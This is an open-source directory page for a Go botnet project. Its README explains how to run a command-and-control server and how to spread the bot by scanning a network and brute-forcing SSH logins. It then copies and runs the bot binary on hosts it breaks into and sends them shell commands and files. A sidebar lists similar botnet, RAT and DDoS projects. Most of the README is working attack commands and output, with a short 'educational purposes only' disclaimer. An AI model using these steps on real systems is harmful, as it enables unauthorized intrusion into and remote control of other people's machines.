All Projects → threeaccents → botnet

threeaccents / botnet

Licence: other
A tcp botnet written in golang

Programming Languages

go
31211 projects - #10 most used programming language
HTML
75241 projects

Labels

Projects that are alternatives of or similar to botnet

Aura Botnet
A super portable botnet framework with a Django-based C2 server. The client is written in C++, with alternate clients written in Rust, Bash, and Powershell.
Stars: ✭ 95 (+23.38%)
Mutual labels:  botnet
Malware
Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools
Stars: ✭ 156 (+102.6%)
Mutual labels:  botnet
Teardroid-phprat
🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio
Stars: ✭ 417 (+441.56%)
Mutual labels:  botnet
Arsenal
Extensible Red Team Framework
Stars: ✭ 99 (+28.57%)
Mutual labels:  botnet
Owasp Mth3l3m3nt Framework
OWASP Mth3l3m3nt Framework is a penetration testing aiding tool and exploitation framework. It fosters a principle of attack the web using the web as well as pentest on the go through its responsive interface.
Stars: ✭ 139 (+80.52%)
Mutual labels:  botnet
Doxycannon
A poorman's proxycannon and botnet, using docker, ovpn files, and a dante socks5 proxy
Stars: ✭ 216 (+180.52%)
Mutual labels:  botnet
Mirai
Mirai related codes and stuff
Stars: ✭ 42 (-45.45%)
Mutual labels:  botnet
Botnet
Remote Access Tool, Command & Control, based on the github project Ares, but written in python 3 with some extra features.
Stars: ✭ 26 (-66.23%)
Mutual labels:  botnet
Hontel
Telnet Honeypot
Stars: ✭ 145 (+88.31%)
Mutual labels:  botnet
winagent
Windows agent for Tactical RMM
Stars: ✭ 20 (-74.03%)
Mutual labels:  botnet
Ddos Rootsec
DDOS Archive by RootSec (Scanners, BotNets (Mirai and QBot Premium & Normal and more), Exploits, Methods, Sniffers)
Stars: ✭ 108 (+40.26%)
Mutual labels:  botnet
Distributed Password Cracking
Borrow CPU cycles from visitor's web browsers to crack MD5 password hashes 😲
Stars: ✭ 136 (+76.62%)
Mutual labels:  botnet
Tacticalrmm
A remote monitoring & management tool, built with Django, Vue and Go.
Stars: ✭ 231 (+200%)
Mutual labels:  botnet
Kratosknife
KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc
Stars: ✭ 97 (+25.97%)
Mutual labels:  botnet
rust botnet
Telegraph botnet written in Rust
Stars: ✭ 15 (-80.52%)
Mutual labels:  botnet
B1tifi
ssh management tool to provides commandline access to a remote system running SSH server
Stars: ✭ 65 (-15.58%)
Mutual labels:  botnet
Botnets
This is a collection of #botnet source codes, unorganized. For EDUCATIONAL PURPOSES ONLY
Stars: ✭ 2,523 (+3176.62%)
Mutual labels:  botnet
blockchain c2c
A Proof of Concept to show how blockchain can solve C2C persistence. PoC originally presented at EuskalHack Security Congress 2017, updated and improved for Cybercamp 2017.
Stars: ✭ 21 (-72.73%)
Mutual labels:  botnet
OrionServer
An open-source, centralized HTTPS botnet
Stars: ✭ 58 (-24.68%)
Mutual labels:  botnet
Telnet Iot Honeypot
Python telnet honeypot for catching botnet binaries
Stars: ✭ 252 (+227.27%)
Mutual labels:  botnet

Go Botnet

Simple botnet written in GO. It features a command and control over cli and a botnet payload that communicates to the C&C over tcp.

Usage:

Compile from the botnet/cmd/botnet directory.

  • Run the C&C:
botnet listen

This starts up a C&C that listens on default port 9999.

  • Attack a machine to get the botnet on the machine. The only supported attack right now is brute forcing SSH
botnet -ufile /paht/to/usernames/file -pfile /path/to/passwords/file -bindir /path/to/botnet/bin/dir attack ssh

This will scan all the ips on the network find which ips have port 22 open and attempt to brute force its way in. Once it has access it will SCP the botnet binary over and execute the botnet client to connect to our command and control center

  • Connect a payload to the C&C:
botnet -target 192.168.2.2 -port 9999 connect

This will start a botnet payload that connects to the C&C on port 9999.

  • Now that we have a payload connected to our C&C we can run a view commands. You'll see the C&C prompt <CC:#>

show all payloads connected to C&C:

<CC:#> show

This will return the payload ids and addresses

ID: 0 Address: 127.0.0.1:64635
ID: 1 Address: 127.0.0.1:64634
  • To communicate with the payload use the use command followed by the payloads id:
<CC:#> use 0

You will notice now your prompt is changed to <PL:#>

  • Execute a command in the remote server just type in a command:
<PL:#> ls -l

This will return the directory where the payload is running

  • Send a file to the payload:
<PL:#> u: /path/to/file

This will send the specified file to the payload

  • Exit out of the payload and go back to the main C&C
<PL:#> exit

You should see a message saying payload exiting and the prompt should be back to <CC#>

#Terms of Use

  • Do NOT use this on any computer you do not own, or are not allowed to run this on.
  • You may NEVER attempt to sell this, its free and open source.
  • The authors and publishers assume no responsibility.
  • For educational purposes only.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].